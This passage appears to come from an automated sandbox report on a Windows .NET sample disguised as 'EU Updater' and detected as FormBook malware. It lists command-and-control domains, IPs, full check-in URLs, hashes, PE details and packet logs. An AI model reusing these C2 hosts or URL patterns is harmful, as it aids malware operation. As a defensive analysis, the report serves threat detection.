http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.carterandcone.com-c	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/w	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/k.S	0%	Avira URL Cloud	safe
http://www.qumpan.com/shjn/?UTqtRv=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABbTrmmBq9f&Whc=0DHdArEp5hQd	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/http	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/l	0%	URL Reputation	safe
http://www.evolvinguniverse.net/portal/index.php?format=feed&type=rss	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cno.	0%	URL Reputation	safe
http://www.carterandcone.comko	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.lakearrowheadescape.com	156.240.151.179	true	false	unknown
www.repsychel.com	142.111.24.2	true	true	unknown
www.flex-aportelabels.com	62.233.121.61	true	true	unknown
www.qumpan.com	46.38.243.234	true	true	unknown
www.christasconezntreats.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.repsychel.com/shjn/?UTqtRv=Bck6v8Q7O88rutfkCywFCzEhcupnZwvilAlKH6TNYdqDwzSjrXWf51hg8vLZW/hTgHNK&Whc=0DHdArEp5hQd	true	Avira URL Cloud: safe	unknown
www.anamentor.com/shjn/	true	Avira URL Cloud: malware	low
http://www.flex-aportelabels.com/shjn/?UTqtRv=M2Xo1sk/PcdvYlySg++E/1rcNB0ZJYFL6a/vKXHyKrNsPeuk4b/zAJjzao2c5vk7I5lO&Whc=0DHdArEp5hQd	true	Avira URL Cloud: safe	unknown
http://www.qumpan.com/shjn/?UTqtRv=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABbTrmmBq9f&Whc=0DHdArEp5hQd	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://supportservices.easyspace.com/	wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	false		high
http://www.fontbureau.com/designers?	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://www.typography.netana	9LjOeq9jnl.exe, 00000002.00000003.308374807.00000000058A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://controlpanel.easyspace.com/	wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	false		high
http://www.carterandcone.com0	9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.easyspace.com/assets/images/structure/easyspace-logo-main.svg	wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	false		high
http://www.fontbureau.com/designers	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://push.zhanzhang.baidu.com/push.js	wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	false		high
http://www.goodfont.co.kr	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.comeg	9LjOeq9jnl.exe, 00000002.00000003.306882909.00000000058BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com	9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.comur=u	9LjOeq9jnl.exe, 00000002.00000003.308033060.00000000058A3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.collada.org/2005/11/COLLADASchema9Done	9LjOeq9jnl.exe, 00000000.00000002.312983865.0000000005340000.00000004.00020000.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/~	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	9LjOeq9jnl.exe, 00000002.00000003.306882909.00000000058BB000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	9LjOeq9jnl.exe, 00000002.00000003.308033060.00000000058A3000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cntaN	9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.como._	9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fonts.com	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/S	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.&	9LjOeq9jnl.exe, 00000002.00000003.311765475.00000000058AB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.tiro.com)	9LjOeq9jnl.exe, 00000002.00000003.311666116.00000000058A7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.urwpp.deDPlease	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/Z	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comK	9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	9LjOeq9jnl.exe, 00000002.00000002.347165395.00000000058A0000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/S	9LjOeq9jnl.exe, 00000002.00000003.315160089.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp//nl	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/ww.ml	9LjOeq9jnl.exe, 00000002.00000003.315160089.00000000058AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.neta	9LjOeq9jnl.exe, 00000002.00000003.308374807.00000000058A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.easyspace.com/	wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css	wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	false		high
https://zz.bdstatic.com/linksubmit/push.js	wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	false		high
http://www.jiyu-kobo.co.jp/H	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0rs	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/C	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comi	9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	9LjOeq9jnl.exe, 00000002.00000003.311569574.00000000058A5000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://www.carterandcone.com-c	9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/w	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/k.S	9LjOeq9jnl.exe, 00000002.00000003.313565748.00000000058AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/http	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/l	9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.evolvinguniverse.net/portal/index.php?format=feed&type=rss	9LjOeq9jnl.exe	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cno.	9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comko	9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
62.233.121.61	www.flex-aportelabels.com	United Kingdom	20860	IOMART-ASGB	true
142.111.24.2	www.repsychel.com	United States	18779	EGIHOSTINGUS	true
46.38.243.234	www.qumpan.com	Germany	197540	NETCUP-ASnetcupGmbHDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	498699
Start date:	07.10.2021
Start time:	12:46:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9LjOeq9jnl (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@13/1@5/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.7% (good quality ratio 37.4%) Quality average: 73.4% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 90 Number of non-executed functions: 126
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.104.136.2, 95.100.218.79, 20.82.210.154, 2.20.178.56, 2.20.178.10, 20.199.120.151, 20.50.102.62, 20.199.120.182, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60, 20.199.120.85 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/498699/sample/9LjOeq9jnl.exe

Simulations

Behavior and APIs

Time	Type	Description
12:47:01	API Interceptor	2x Sleep call for process: 9LjOeq9jnl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
62.233.121.61	DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsx	Get hash	malicious	Browse	www.flex-aportelabels.com/shjn/?NRX4i6=BxoHnNf8mX1&lL=M2Xo1sk6PbdrY1+ei++E/1rcNB0ZJYFL6an/WUbzOLNtPvCi/Lu/WNbxZNaK9/gID64+Yg==
	tw5UWfYw0b.exe	Get hash	malicious	Browse	www.mindbodyweightlossmethod.com/vngb/?048lIRS8=fUsnVxe9YESkxdfSEt2ERrG+yoqMIIUvdteTfjTAeNwY9Pq8GCGjsHZP8wZ3suac1Euv&h6Ah7T=t6Ahwxdh7z3T
	boss.exe	Get hash	malicious	Browse	www.cloudrevolutionawards.com/p596/?lH8dSd=oBtwUsLti9CpyUvPu8hspMU4RqRGfYnSZxwbc4qzjdDm9j/UbPXw1i0j3qCPUC+GGxE8&WpTHN=7nzhbfhh
	ULnsMhkLMmFISmk.exe	Get hash	malicious	Browse	www.cloudrevolutionawards.com/p596/?IXMTVvhX=oBtwUsLti9CpyUvPu8hspMU4RqRGfYnSZxwbc4qzjdDm9j/UbPXw1i0j3pi1ETe+cWl7&TPUt=5jstIRuxCB_0_Vw0
	New Vendor - Setup Form.exe	Get hash	malicious	Browse	www.cyberessentialstutor.com/rerx/?D48t=lrTkqGVK66VgUkLJEK272lTavINDu9I4ttvr+3xZS5NMU3C+qDvAkyUG6xILrs3+Q9UK&IbYdX4=Dxo0sPDXHVC4H

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.flex-aportelabels.com	DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsx	Get hash	malicious	Browse	62.233.121.61
www.repsychel.com	VmbABLKNbD.exe	Get hash	malicious	Browse	142.111.24.2
www.qumpan.com	OApfyh3Vfm.exe	Get hash	malicious	Browse	46.38.243.234

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IOMART-ASGB	DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsx	Get hash	malicious	Browse	62.233.121.61
	Scanned Copy.xlsx	Get hash	malicious	Browse	31.3.244.76
	PO no 275.xlsx	Get hash	malicious	Browse	31.3.244.76
	FACTURA.exe	Get hash	malicious	Browse	109.169.39.245
	tw5UWfYw0b.exe	Get hash	malicious	Browse	62.233.121.61
	v3YfBIj.HtML	Get hash	malicious	Browse	5.152.205.141
	SB883681QI.xlsx	Get hash	malicious	Browse	31.3.244.76
	FACTURA.exe	Get hash	malicious	Browse	109.169.39.245
	Faktura 900011706 - 2476.exe	Get hash	malicious	Browse	109.169.39.245
	H9pNgz5hYJ	Get hash	malicious	Browse	212.38.173.97
	Zapytanie ofertowe (SMAY-300921).exe	Get hash	malicious	Browse	109.169.39.245
	FACTURA.exe	Get hash	malicious	Browse	109.169.39.245
	Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe	Get hash	malicious	Browse	109.169.39.245
	FACTURA.exe	Get hash	malicious	Browse	109.169.39.245
	LISTA DE PEDIDO DE COMPRA.exe	Get hash	malicious	Browse	109.169.39.245
	Dokument VAT I - 85926 09 2021 MAG-8.exe	Get hash	malicious	Browse	109.169.39.245
	4czqYWTUq8	Get hash	malicious	Browse	217.147.86.101
	b8uTZxALDh	Get hash	malicious	Browse	176.56.205.97
	XMae11M5yg	Get hash	malicious	Browse	109.75.167.7
	BESTPREIS-ANFRAGE.exe	Get hash	malicious	Browse	109.169.39.245

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9LjOeq9jnl.exe.log Download File
Process:	C:\Users\user\Desktop\9LjOeq9jnl.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.879451012145165
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	9LjOeq9jnl.exe
File size:	642048
MD5:	ca7b5f2ec232fadefa0af01ae3cba9be
SHA1:	9f9b5551877ab792aedb2e6b89a61ce779566ae5
SHA256:	dcfd181e8143ae4b31ae3d289b57113fdc67449735acd5d459a358766f401035
SHA512:	f5cfe15068aa0ab941cac071d93cd8161788999a03a36954d08e4fa836a7d5ff117dc5795c79caccb1e91c5f406c30db1701b9ff6f974d7034d904526aee9326
SSDEEP:	12288:nh5koU+5zaPd8993hVaJyWF8XaMEiu5ANqxI9TBr+7X054Jd:h5kd+liaFNWqXMKNqe9drUk5U
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.]a..............0.............R.... ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x49e052
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x615DD531 [Wed Oct 6 16:56:17 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9e000	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa0000	0x5cc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9c058	0x9c200	False	0.911049151821	data	7.88591901326	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa0000	0x5cc	0x600	False	0.42578125	data	4.11310999765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa2000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xa0090	0x33c	data
RT_MANIFEST	0xa03dc	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2008
Assembly Version	1.0.0.0
InternalName	cDisplayClass1.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	EU Updater
ProductVersion	1.0.0.0
FileDescription	EU Updater
OriginalFilename	cDisplayClass1.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/07/21-12:48:53.517746	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49838	80	192.168.2.3	142.111.24.2
10/07/21-12:48:53.517746	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49838	80	192.168.2.3	142.111.24.2
10/07/21-12:48:53.517746	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49838	80	192.168.2.3	142.111.24.2

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 12:48:48.091219902 CEST	49830	80	192.168.2.3	62.233.121.61
Oct 7, 2021 12:48:48.129060984 CEST	80	49830	62.233.121.61	192.168.2.3
Oct 7, 2021 12:48:48.129196882 CEST	49830	80	192.168.2.3	62.233.121.61
Oct 7, 2021 12:48:48.129311085 CEST	49830	80	192.168.2.3	62.233.121.61
Oct 7, 2021 12:48:48.166903019 CEST	80	49830	62.233.121.61	192.168.2.3
Oct 7, 2021 12:48:48.167762995 CEST	80	49830	62.233.121.61	192.168.2.3
